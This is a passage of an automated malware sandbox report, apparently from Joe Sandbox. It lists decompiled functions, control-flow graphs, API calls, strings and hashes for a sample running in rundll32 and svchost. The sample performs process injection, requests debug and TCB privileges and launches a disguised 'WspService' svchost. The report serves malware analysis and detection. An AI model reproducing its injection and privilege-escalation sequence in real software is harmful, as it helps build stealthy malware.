                                                            • Opcode Fuzzy Hash: f6b8eb1458dc7b10485778205b546b640c2c449d8bc84224bfc4460c879e5d4b
                                                            • Instruction Fuzzy Hash: 641148729002099BEF106F94CC49BA677B4EF51315F0541B9ED485B390FBB1BD0483E5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 89%
                                                            			E04649620(void* __ebx, intOrPtr* __ecx, void* __edi, void* __esi, void* __eflags) {
                                                            				signed int _v8;
                                                            				char _v88;
                                                            				short _v608;
                                                            				signed int _t17;
                                                            				signed int* _t23;
                                                            				intOrPtr _t32;
                                                            				void* _t35;
                                                            				void* _t36;
                                                            				signed int* _t41;
                                                            				intOrPtr* _t43;
                                                            				signed int _t44;
                                                            
                                                            				_t17 =  *0x4684008; // 0xd355be4e
                                                            				_v8 = _t17 ^ _t44;
                                                            				_t43 = __ecx;
                                                            				E04646050(__ebx, L"Global",  &_v88, __edi, __ecx);
                                                            				wsprintfW( &_v608, L"SOFTWARE\\Classes\\CLSID\\%s",  &_v88);
                                                            				_t23 = E04640C60(0x80000002,  &_v608, L"Global", _t43);
                                                            				_t32 =  *_t43;
                                                            				_t41 = _t23;
                                                            				if(_t32 > 1) {
                                                            					_t35 = _t32 - 1;
                                                            					 *(_t35 + _t41) =  *(_t35 + _t41) ^  *_t41;
                                                            					_t36 = _t35 - 1;
                                                            					while(_t36 != 0) {
                                                            						 *(_t36 + _t41) =  *(_t36 + _t41) ^  *(_t36 +  &(_t41[0]));
                                                            						_t36 = _t36 - 1;
                                                            					}
                                                            					 *(_t36 + _t41) =  *(_t36 + _t41) ^  *(_t36 +  &(_t41[0]));
                                                            				}
                                                            				return E04655AFE(_v8 ^ _t44);
                                                            			}














                                                            0x04649629
                                                            0x04649630
                                                            0x04649634
                                                            0x0464963f
                                                            0x04649654
                                                            0x0464966a
                                                            0x0464966f
                                                            0x04649674
                                                            0x04649679
                                                            0x0464967d
                                                            0x0464967e
                                                            0x04649681
                                                            0x04649684
                                                            0x0464968a
                                                            0x0464968d
                                                            0x0464968d
                                                            0x04649696
                                                            0x04649699
                                                            0x046496aa

                                                            APIs
                                                              • Part of subcall function 04646050: RegOpenKeyExW.KERNEL32(80000002,004F0053,00000000,00020119,?,00000000,00000000,0000038F), ref: 046461F1
                                                              • Part of subcall function 04646050: RegQueryValueExW.KERNEL32(?,0061004D,00000000,?,?,0000004A), ref: 0464621F
                                                              • Part of subcall function 04646050: RegCloseKey.ADVAPI32(?), ref: 04646235
                                                            • wsprintfW.USER32 ref: 04649654
                                                              • Part of subcall function 04640C60: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00020119,?,0464966F,?,?), ref: 04640C73
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Open$CloseQueryValuewsprintf
                                                            • String ID: Global$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 734024169-1865207932
                                                            • Opcode ID: 477fce7bf72321f63ceea0b84835e5315c05c22d9930e0872ed854ade7dc9ad5
                                                            • Instruction ID: 73788a4b9889f062fba15ad7714612164ec24686739c64574a833d58676f65f8
                                                            • Opcode Fuzzy Hash: 477fce7bf72321f63ceea0b84835e5315c05c22d9930e0872ed854ade7dc9ad5
                                                            • Instruction Fuzzy Hash: 7A016D315091459BCB24DFB8C8544BABB69DFC5218F2401EED0568F203F932A90EC795
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0463E660() {
                                                            				intOrPtr* _t10;
                                                            				void* _t11;
                                                            				void** _t19;
                                                            				intOrPtr* _t21;
                                                            				void* _t28;
                                                            
                                                            				_t10 =  *0x4687aec; // 0x2ab0b60
                                                            				_t21 =  *_t10;
                                                            				if(_t21 == _t10) {
                                                            					return _t10;
                                                            				}
                                                            				do {
                                                            					_t19 =  *(_t21 + 8);
                                                            					_t11 =  *_t19;
                                                            					if(_t11 == 0) {
                                                            						goto L9;
                                                            					}
                                                            					_t19[0xa] = 1;
                                                            					_t19[9] = 0;
                                                            					if( *((intOrPtr*)(_t11 + 4)) != 0) {
                                                            						L7:
                                                            						_t11 = _t19[8];
                                                            						if(_t11 != 0) {
                                                            							WaitForSingleObject(_t11, 0xffffffff);
                                                            							_t11 = CloseHandle(_t19[8]);
                                                            							_t19[8] = 0;
                                                            						}
                                                            						goto L9;
                                                            					}
                                                            					_t17 = _t19[0xb];
                                                            					if(_t19[0xb] == 0) {
                                                            						goto L9;
                                                            					}
                                                            					_t11 = E0463D260(_t17, "stop");
                                                            					if(_t11 == 0) {
                                                            						goto L9;
                                                            					}
                                                            					 *_t11();
                                                            					goto L7;
                                                            					L9:
                                                            					_t19[0xa] = 0;
                                                            					_t21 =  *_t21;
                                                            					_t28 = _t21 -  *0x4687aec; // 0x2ab0b60
                                                            				} while (_t28 != 0);
                                                            				return _t11;
                                                            			}








                                                            0x0463e660
                                                            0x0463e666
                                                            0x0463e66a
                                                            0x0463e6d8
                                                            0x0463e6d8
                                                            0x0463e674
                                                            0x0463e674
                                                            0x0463e677
                                                            0x0463e67b
                                                            0x00000000
                                                            0x00000000
                                                            0x0463e681
                                                            0x0463e688
                                                            0x0463e68f
                                                            0x0463e6a8
                                                            0x0463e6a8
                                                            0x0463e6ad
                                                            0x0463e6b2
                                                            0x0463e6b7
                                                            0x0463e6bd
                                                            0x0463e6bd
                                                            0x00000000
                                                            0x0463e6ad
                                                            0x0463e691
                                                            0x0463e696
                                                            0x00000000
                                                            0x00000000
                                                            0x0463e69d
                                                            0x0463e6a4
                                                            0x00000000
                                                            0x00000000
                                                            0x0463e6a6
                                                            0x00000000
                                                            0x0463e6c4
                                                            0x0463e6c4
                                                            0x0463e6cb
                                                            0x0463e6cd
                                                            0x0463e6cd
                                                            0x00000000

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,?,00000000,00000000,0463E869), ref: 0463E6B2
                                                            • CloseHandle.KERNEL32(?), ref: 0463E6B7
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleObjectSingleWait
                                                            • String ID: stop
                                                            • API String ID: 528846559-3109426870
                                                            • Opcode ID: fa40d2e188a8e9a696225d6a0d5db78bd181a9037a3067203c3ae2a2f7e32bd6
                                                            • Instruction ID: db6859ac7b501550bb0988966b7a58ee8ffb2c02df16b5180b330eaa588b2964
                                                            • Opcode Fuzzy Hash: fa40d2e188a8e9a696225d6a0d5db78bd181a9037a3067203c3ae2a2f7e32bd6
                                                            • Instruction Fuzzy Hash: 1E016232700652AFEB14DF15D844B16B3A4FF1A325F144218D45497B90E776FC50CBB5
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 68%
                                                            			E0463E550(intOrPtr* __ecx) {
                                                            				intOrPtr _t10;
                                                            				void* _t12;
                                                            				intOrPtr* _t16;
                                                            				intOrPtr* _t20;
                                                            
                                                            				_t20 = __ecx;
                                                            				_t10 =  *__ecx;
                                                            				if(_t10 == 0) {
                                                            					L7:
                                                            					 *(_t20 + 0x28) = 0;
                                                            					return 1;
                                                            				} else {
                                                            					 *((intOrPtr*)(__ecx + 0x28)) = 1;
                                                            					 *(__ecx + 0x24) = 0;
                                                            					if( *((intOrPtr*)(_t10 + 4)) != 0) {
                                                            						L5:
                                                            						_t12 =  *(_t20 + 0x20);
                                                            						if(_t12 != 0) {
                                                            							WaitForSingleObject(_t12, 0xffffffff);
                                                            							CloseHandle( *(_t20 + 0x20));
                                                            							 *(_t20 + 0x20) = 0;
                                                            						}
                                                            						goto L7;
                                                            					} else {
                                                            						_t19 =  *((intOrPtr*)(__ecx + 0x2c));
                                                            						if( *((intOrPtr*)(__ecx + 0x2c)) == 0) {
                                                            							L8:
                                                            							 *(_t20 + 0x28) = 0;
                                                            							return 0;
                                                            						} else {
                                                            							_t16 = E0463D260(_t19, "stop");
                                                            							if(_t16 == 0) {
                                                            								goto L8;
                                                            							} else {
                                                            								 *_t16();
                                                            								goto L5;
                                                            							}
                                                            						}
                                                            					}
                                                            				}
                                                            			}







                                                            0x0463e551
                                                            0x0463e553
                                                            0x0463e557
                                                            0x0463e5a4
                                                            0x0463e5a4
                                                            0x0463e5b1
                                                            0x0463e559
                                                            0x0463e55d
                                                            0x0463e564
                                                            0x0463e56b
                                                            0x0463e584
                                                            0x0463e584
                                                            0x0463e589
                                                            0x0463e58e
                                                            0x0463e597
                                                            0x0463e59d
                                                            0x0463e59d
                                                            0x00000000
                                                            0x0463e56d
                                                            0x0463e56d
                                                            0x0463e572
                                                            0x0463e5b2
                                                            0x0463e5b4
                                                            0x0463e5b8
                                                            0x0463e574
                                                            0x0463e579
                                                            0x0463e580
                                                            0x00000000
                                                            0x0463e582
                                                            0x0463e582
                                                            0x00000000
                                                            0x0463e582
                                                            0x0463e580
                                                            0x0463e572
                                                            0x0463e56b

                                                            APIs
                                                            • WaitForSingleObject.KERNEL32(?,000000FF,00000000,0463E288,00000000,0463F0D5,00000000,00000000,?,?,00000001), ref: 0463E58E
                                                            • CloseHandle.KERNEL32(?), ref: 0463E597
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandleObjectSingleWait
                                                            • String ID: stop
                                                            • API String ID: 528846559-3109426870
                                                            • Opcode ID: 50a3f06d0e7d93d8cf2f0056bf31869a8b0e629a0ac00dd21a360541516d57a3
                                                            • Instruction ID: aea40c4132e774a4b32ae3839eda4eb99bb992b68faf5279a0ef7868bced886b
                                                            • Opcode Fuzzy Hash: 50a3f06d0e7d93d8cf2f0056bf31869a8b0e629a0ac00dd21a360541516d57a3
                                                            • Instruction Fuzzy Hash: 1FF01D706047518FEB749F69E848B5276E4BF08336F144A1CE49AC7690FB76F880CB64
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            C-Code - Quality: 100%
                                                            			E04656A70(intOrPtr* __ecx, void* __eflags) {
                                                            				intOrPtr* _t13;
                                                            
                                                            				_t13 = __ecx;
                                                            				E04656AC3(__ecx);
                                                            				 *__ecx = 0x38;
                                                            				 *((intOrPtr*)(__ecx + 8)) = 0x4630000;
                                                            				 *((intOrPtr*)(__ecx + 4)) = 0x4630000;
                                                            				 *((intOrPtr*)(__ecx + 0xc)) = 0xe00;
                                                            				 *((intOrPtr*)(__ecx + 0x10)) = 0x4674758;
                                                            				if(E046316B0(__ecx + 0x14) < 0) {
                                                            					if(IsDebuggerPresent() != 0) {
                                                            						OutputDebugStringW(L"ERROR : Unable to initialize critical section in CAtlBaseModule\n");
                                                            					}
                                                            					 *0x46878c4 = 1;
                                                            				}
                                                            				return _t13;
                                                            			}




                                                            0x04656a71
                                                            0x04656a73
                                                            0x04656a7d
                                                            0x04656a86
                                                            0x04656a89
                                                            0x04656a8c
                                                            0x04656a93
                                                            0x04656aa1
                                                            0x04656aab
                                                            0x04656ab2
                                                            0x04656ab2
                                                            0x04656ab8
                                                            0x04656ab8
                                                            0x04656ac2

                                                            APIs
                                                              • Part of subcall function 046316B0: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,04656A9F,00000000,?,046816F4,?,?,?,?,?,?,?,04655B38), ref: 046316B3
                                                              • Part of subcall function 046316B0: GetLastError.KERNEL32(?,?,?,?,?,?,04655B38), ref: 046316BD
                                                            • IsDebuggerPresent.KERNEL32(00000000,?,046816F4,?,?,?,?,?,?,?,04655B38), ref: 04656AA3
                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,?,?,?,04655B38), ref: 04656AB2
                                                            Strings
                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 04656AAD
                                                            Memory Dump Source
                                                            • Source File: 00000005.00000002.439427822.0000000004630000.00000040.00001000.00020000.00000000.sdmp, Offset: 04630000, based on PE: true
                                                            • Associated: 00000005.00000002.439618235.0000000004674000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_5_2_4630000_rundll32.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CountCriticalDebugDebuggerErrorInitializeLastOutputPresentSectionSpinString
                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                            • API String ID: 450123788-631824599
                                                            • Opcode ID: 908aba826dc418791ada562371260d650e236990c8484e3dd86316146f98d149
                                                            • Instruction ID: 9db5d73d60a9757c26b13b5bf97b5c261b8e645dbcd40c6356a0ef73c2a7be3a
                                                            • Opcode Fuzzy Hash: 908aba826dc418791ada562371260d650e236990c8484e3dd86316146f98d149
                                                            • Instruction Fuzzy Hash: ABE06D706007808BE3609F68E5087427BE0EB05309F05CA5CE89AC2350FBB8F858CB92
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 0 22baf54c670-22baf54c70f call 22baf563830 * 2 GetVersionExW call 22baf549480 7 22baf54c711-22baf54c718 call 22baf549530 0->7 8 22baf54c71e-22baf54c720 0->8 7->8 10 22baf54c7f8 7->10 8->10 11 22baf54c726-22baf54c73d OpenProcess 8->11 13 22baf54c7fa-22baf54c81a GetSystemDirectoryW 10->13 11->10 14 22baf54c743-22baf54c786 LoadLibraryA GetProcAddress LoadLibraryA GetProcAddress 11->14 15 22baf54c81c-22baf54c838 13->15 16 22baf54c846-22baf54c863 wsprintfW 13->16 14->10 17 22baf54c788-22baf54c78b 14->17 18 22baf54cb51-22baf54cbac call 22baf55ad48 call 22baf54dc70 * 2 call 22baf54db00 * 2 15->18 19 22baf54c83e 15->19 20 22baf54c9e0-22baf54ca1d CreateProcessW 16->20 21 22baf54c869-22baf54c895 LoadLibraryA GetProcAddress 16->21 17->10 22 22baf54c78d-22baf54c7bd call 22baf55a828 17->22 86 22baf54cbae-22baf54cbb3 Sleep 18->86 87 22baf54cbb9-22baf54cbbb 18->87 19->16 23 22baf54ca1f-22baf54ca22 20->23 24 22baf54c8a0-22baf54c8ba 21->24 64 22baf54c8f9-22baf54c903 call 22baf55a7e4 22->64 65 22baf54c7c3-22baf54c7e8 22->65 26 22baf54ca58-22baf54ca5f 23->26 27 22baf54ca24-22baf54ca44 LoadLibraryA GetProcAddress 23->27 24->20 38 22baf54c8c0-22baf54c8d2 24->38 34 22baf54ca61 CloseHandle 26->34 35 22baf54ca67-22baf54ca69 26->35 30 22baf54ca4b-22baf54ca53 call 22baf55a7e4 27->30 31 22baf54ca46 27->31 30->26 31->30 34->35 40 22baf54ca6b-22baf54ca89 GetThreadContext 35->40 41 22baf54cabe 35->41 45 22baf54c8d4-22baf54c8d8 38->45 46 22baf54c916-22baf54c91c 38->46 40->41 47 22baf54ca8b-22baf54cab4 VirtualAllocEx 40->47 44 22baf54cac0-22baf54cae9 call 22baf55a7c0 41->44 54 22baf54c8e0-22baf54c8eb 45->54 52 22baf54c941-22baf54c966 LoadLibraryA GetProcAddress 46->52 53 22baf54c91e 46->53 48 22baf54caea-22baf54cb04 WriteProcessMemory 47->48 49 22baf54cab6 47->49 59 22baf54cb0f-22baf54cb2a SetThreadContext 48->59 60 22baf54cb06-22baf54cb0d 48->60 56 22baf54cab8 TerminateProcess 49->56 78 22baf54c980-22baf54c98d call 22baf54c5c0 52->78 79 22baf54c968-22baf54c978 Sleep 52->79 61 22baf54c920-22baf54c92c 53->61 62 22baf54c8ed-22baf54c8f2 54->62 63 22baf54c908-22baf54c914 54->63 56->41 59->60 70 22baf54cb2c-22baf54cb3a ResumeThread 59->70 60->56 68 22baf54c92e-22baf54c933 61->68 69 22baf54c937-22baf54c93d 61->69 62->54 72 22baf54c8f4 62->72 63->46 63->52 64->13 80 22baf54c7ee-22baf54c7f2 65->80 81 22baf54c8f6 65->81 68->61 76 22baf54c935 68->76 69->52 70->60 77 22baf54cb3c-22baf54cb4c CloseHandle 70->77 72->46 76->52 77->44 78->20 88 22baf54c98f-22baf54c9de CreateProcessAsUserW CloseHandle 78->88 79->24 84 22baf54c97e 79->84 80->10 81->64 84->20 86->87 89 22baf54cbbd-22baf54cbc2 Sleep 87->89 90 22baf54cbc8-22baf54cbca 87->90 88->20 88->23 89->90 91 22baf54cbcc-22baf54cbd1 Sleep 90->91 92 22baf54cbd7-22baf54cbd9 90->92 91->92 93 22baf54cbdb-22baf54cbe0 Sleep 92->93 94 22baf54cbe6-22baf54cbfd call 22baf54be20 92->94 93->94 96 22baf54cc02-22baf54cc06 94->96 97 22baf54cc0c-22baf54cc15 96->97 98 22baf54ccc3 96->98 99 22baf54cd00-22baf54cd0e call 22baf54bfa0 97->99 100 22baf54cc1b-22baf54cc29 call 22baf54bfa0 97->100 101 22baf54ccc5-22baf54cccd 98->101 109 22baf54cd10-22baf54cd24 call 22baf54c100 99->109 110 22baf54cd5d-22baf54cd62 99->110 100->99 108 22baf54cc2f 100->108 103 22baf54cccf CloseHandle 101->103 104 22baf54ccd5-22baf54cceb 101->104 103->104 111 22baf54cc30-22baf54cc35 108->111 109->99 124 22baf54cd26-22baf54cd2c 109->124 112 22baf54ce50-22baf54ce61 SetConsoleCtrlHandler 110->112 113 22baf54cd68-22baf54cd6d 110->113 115 22baf54ccb0-22baf54ccc1 SetConsoleCtrlHandler 111->115 116 22baf54cc37-22baf54cc3c 111->116 112->112 119 22baf54ce63 112->119 117 22baf54ce18-22baf54ce2e OpenThread 113->117 118 22baf54cd73-22baf54cd92 Sleep call 22baf54c100 113->118 115->98 115->115 116->115 121 22baf54cc3e-22baf54cc54 OpenThread 116->121 117->109 122 22baf54ce34-22baf54ce40 WaitForSingleObject 117->122 118->99 131 22baf54cd98-22baf54cd9e 118->131 119->101 121->99 125 22baf54cc5a-22baf54cc76 WaitForSingleObject GetExitCodeThread 121->125 126 22baf54ccec-22baf54ccf5 CloseHandle 122->126 124->99 128 22baf54cd2e-22baf54cd44 call 22baf54c670 call 22baf55a7e4 124->128 129 22baf54cc7e-22baf54cc91 call 22baf54be20 125->129 130 22baf54cc78-22baf54cc7c 125->130 126->99 128->99 142 22baf54cd46-22baf54cd59 WaitForSingleObject 128->142 129->99 140 22baf54cc93-22baf54cca1 call 22baf54bfa0 129->140 130->98 130->129 131->99 135 22baf54cda4-22baf54cdba call 22baf54c670 call 22baf55a7e4 131->135 135->99 149 22baf54cdc0-22baf54cdd3 WaitForSingleObject 135->149 140->111 148 22baf54cca3 140->148 142->99 145 22baf54cd5b 142->145 145->126 148->99 149->99 150 22baf54cdd9-22baf54cdf7 CloseHandle call 22baf538a60 149->150 153 22baf54ce00-22baf54ce11 SetConsoleCtrlHandler 150->153 153->153 154 22baf54ce13 153->154 154->101
                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$Process$AddressOpenProcSleepThread$LibraryLoad$ObjectSingleWait$Createwsprintf$ContextCurrentProcess32$AllocCodeConsoleCtrlDirectoryEventExitFirstHandlerMemoryModuleNextQueryResumeSnapshotSystemTerminateToolhelp32UserValueVersionVirtualWrite
                                                            • String ID: %ssvchost.exe -k WspService$@$Control$DeleteProcThreadAttributeList$Dispatch$InitializeProcThreadAttributeList$SeAssignPrimaryTokenPrivilege$SeDebugPrivilege$SeIncreaseQuotaPrivilege$SeTcbPrivilege$UpdateProcThreadAttribute$WTSEnumerateSessionsW$WTSFreeMemory$Wtsapi32.dll$kernel32.dll
                                                            • API String ID: 1264320819-619775204
                                                            • Opcode ID: e0b9272f5675718f1d25d3e68456d62b7036b666d676c3fa1658bde5efbdda2d
                                                            • Instruction ID: 7a73cf46122081426b1c2d90e1421009d159d7e30620e3e87312f60de8caa78c
                                                            • Opcode Fuzzy Hash: e0b9272f5675718f1d25d3e68456d62b7036b666d676c3fa1658bde5efbdda2d
                                                            • Instruction Fuzzy Hash: B2228133600A40B2EB72DFA5E84D3E977A2FBC5B45F444525DA4A43BAAEF3AC505C740
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: CloseHandle$CreateInternetThread$ObjectOpenSingleWait$CommandFileLineModuleNamelstrcmpi
                                                            • String ID: AppService$Mozilla/4.0 (compatible)$WspService$netsvcs$svchost.exe
                                                            • API String ID: 949907800-2775505531
                                                            • Opcode ID: 93364024fc43d5ae01f3a0557c40b867651d94c1161c1beb000f77d600ff61f4
                                                            • Instruction ID: b7b9b9bab370d4f46ec8bf61db76c76eb5ca47855f61b2d502462a9caecf91fb
                                                            • Opcode Fuzzy Hash: 93364024fc43d5ae01f3a0557c40b867651d94c1161c1beb000f77d600ff61f4
                                                            • Instruction Fuzzy Hash: 60613B33601A41B2FF369BE6B85D7DA73E1FB89B86F440525994A47B6ADF3EC0448700
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: ProcessToken$AdjustCloseCurrentHandleLookupOpenPrivilegePrivilegesValue
                                                            • String ID:
                                                            • API String ID: 3038321057-0
                                                            • Opcode ID: 606a530153bfaf833a05266ad45227eaf8efb2bfc1ccbde9458617e2ac6c2f81
                                                            • Instruction ID: a030ad41f799933a33ef84eecafe27ec44fccd3a17cbc349308fd596e279811f
                                                            • Opcode Fuzzy Hash: 606a530153bfaf833a05266ad45227eaf8efb2bfc1ccbde9458617e2ac6c2f81
                                                            • Instruction Fuzzy Hash: AF115673214B44A6EB618F61F84C29EB7B1FBC8B80F404515EA5E43A69DF3DC445CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            • Executed
                                                            • Not Executed
                                                            control_flow_graph 257 22baf4702e8-22baf470366 call 22baf4700f8 * 6 270 22baf47036f-22baf470377 257->270 271 22baf470368-22baf47036a 257->271 273 22baf470379-22baf470381 270->273 274 22baf470383-22baf470391 270->274 272 22baf4706c4-22baf4706d8 271->272 273->271 273->274 274->271 275 22baf470393-22baf47039a 274->275 276 22baf47039c-22baf4703a3 275->276 277 22baf4703a5-22baf4703af 275->277 276->271 276->277 277->271 278 22baf4703b1-22baf4703b6 277->278 278->271 279 22baf4703b8-22baf4703c2 278->279 279->271 280 22baf4703c4-22baf4703d9 279->280 281 22baf4703fd-22baf470405 280->281 282 22baf4703db-22baf4703dc 280->282 281->271 284 22baf47040b-22baf470425 281->284 283 22baf4703e2-22baf4703e9 282->283 283->271 285 22baf4703ef-22baf4703f9 283->285 286 22baf470427-22baf470428 284->286 287 22baf470463-22baf470468 284->287 285->283 290 22baf4703fb 285->290 288 22baf47042e-22baf470461 286->288 287->271 289 22baf47046e-22baf470487 287->289 288->287 288->288 289->271 292 22baf47048d-22baf4704a8 289->292 290->281 294 22baf4704aa-22baf4704ab 292->294 295 22baf4704f3-22baf4704fb 292->295 298 22baf4704ae-22baf4704bf 294->298 296 22baf470500-22baf47050e 295->296 297 22baf4704fd 295->297 299 22baf470512-22baf47051a 296->299 300 22baf470510 296->300 297->296 301 22baf4704c1-22baf4704cc 298->301 302 22baf4704e3-22baf4704ec 298->302 303 22baf470520-22baf470527 299->303 304 22baf4705ae-22baf4705b6 299->304 300->299 301->302 305 22baf4704ce-22baf4704e1 301->305 302->298 306 22baf4704ee-22baf4704ef 302->306 303->304 309 22baf47052d-22baf470541 303->309 307 22baf4705bc-22baf4705c4 304->307 308 22baf470656-22baf470660 304->308 305->302 306->295 307->308 310 22baf4705ca-22baf4705ea LoadLibraryA 307->310 313 22baf470662-22baf47066a 308->313 314 22baf470689-22baf4706a3 308->314 309->304 311 22baf470543-22baf470544 309->311 310->271 316 22baf4705f0-22baf4705f6 310->316 317 22baf470549-22baf470558 311->317 313->314 315 22baf47066c-22baf470686 313->315 324 22baf4706c2 314->324 325 22baf4706a5-22baf4706bd 314->325 315->314 318 22baf47063f-22baf470647 316->318 319 22baf4705f8-22baf4705fc 316->319 321 22baf47055a-22baf47055b 317->321 322 22baf470595-22baf4705a4 317->322 318->310 327 22baf470649-22baf470652 318->327 323 22baf4705fe-22baf470607 319->323 326 22baf47055e-22baf470576 321->326 322->317 328 22baf4705a6-22baf4705a7 322->328 329 22baf47060e-22baf470613 323->329 330 22baf470609-22baf47060c 323->330 324->272 325->271 331 22baf470589-22baf470590 326->331 332 22baf470578-22baf470586 326->332 327->308 328->304 333 22baf470615-22baf470622 329->333 330->333 331->326 335 22baf470592-22baf470593 331->335 332->331 333->271 338 22baf470628-22baf47063d 333->338 335->322 338->318 338->323
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.790579289.0000022BAF470000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF470000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf470000_svchost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: @
                                                            • API String ID: 0-2766056989
                                                            • Opcode ID: 739c296a9697dce867674b68c91ad80ebd600e591245c06e1fe6f325da1f2255
                                                            • Instruction ID: 18f3ca021b3817cf8b2a417d8017740e06fbebeb0b39122a12bbb055a0e63a26
                                                            • Opcode Fuzzy Hash: 739c296a9697dce867674b68c91ad80ebd600e591245c06e1fe6f325da1f2255
                                                            • Instruction Fuzzy Hash: 9AD1C231215A099BEB6DDA6CC89D3F677D1FB94305F18452DD48BC3285EF26E842C781
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            APIs
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000007.00000002.792689473.0000022BAF530000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000022BAF530000, based on PE: true
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_7_2_22baf530000_svchost.jbxd
                                                            Yara matches
                                                            Similarity
                                                            • API ID: Close$CreateValuewsprintf$CurrentErrorEventHandleLastOpenQueryThread
                                                            • String ID: Global\%s$SOFTWARE\Classes\CLSID\%s
                                                            • API String ID: 709688788-2346361075
                                                            • Opcode ID: bec658a7c8cccb5f9210049f6dad1c5a3ed7fef517fcb5cc4d39df75041d65dc
                                                            • Instruction ID: 69f9d95289fe6b277686ed321c761adaef6606bde1f838d01eb1aa71cfd40e99
                                                            • Opcode Fuzzy Hash: bec658a7c8cccb5f9210049f6dad1c5a3ed7fef517fcb5cc4d39df75041d65dc
                                                            • Instruction Fuzzy Hash: B3416C73205B84E2EB319FA5F48D39AB7A5F784B94F404015EA8D43B6ADF79C158CB40
                                                            Uniqueness

                                                            Uniqueness Score: -1.00%

                                                            Control-flow Graph

                                                            C-Code - Quality: 16%
                                                            			E0000022B22BAF54C100(void* __eflags, intOrPtr* __rcx, long long __rdi, long long __rsi, long long _a16, long long _a24) {
                                                            				signed int _v24;
                                                            				void* _v552;
                                                            				char _v632;
                                                            				char _v640;
                                                            				char _v644;
                                                            				char _v648;
                                                            				signed char* _v656;
                                                            				signed char* _v664;
                                                            				void* __rbx;
                                                            				long _t44;
                                                            				char _t45;
                                                            				void* _t55;
                                                            				intOrPtr _t56;
                                                            				void* _t70;
                                                            				signed long long _t72;
                                                            				signed char* _t75;
                                                            				signed char* _t78;
                                                            				signed char* _t79;
                                                            				char* _t94;
                                                            				intOrPtr* _t100;
                                                            				signed long long _t102;
                                                            				char* _t107;
                                                            
                                                            				_t72 =  *0xaf595008; // 0x486b4b98dc9d
                                                            				_v24 = _t72 ^ _t102;
                                                            				_a16 = __rsi;
                                                            				_t100 = __rcx;
                                                            				E0000022B22BAF549800(_t78, L"Global",  &_v632, __rcx);
                                                            				wsprintfW(??, ??);
                                                            				r9d = 0x20119;
                                                            				r8d = 0;
                                                            				_v664 =  &_v640;
                                                            				if (RegOpenKeyExW(??, ??, ??, ??, ??) != 0) goto 0xaf54c23b;
                                                            				_t75 =  &_v648;
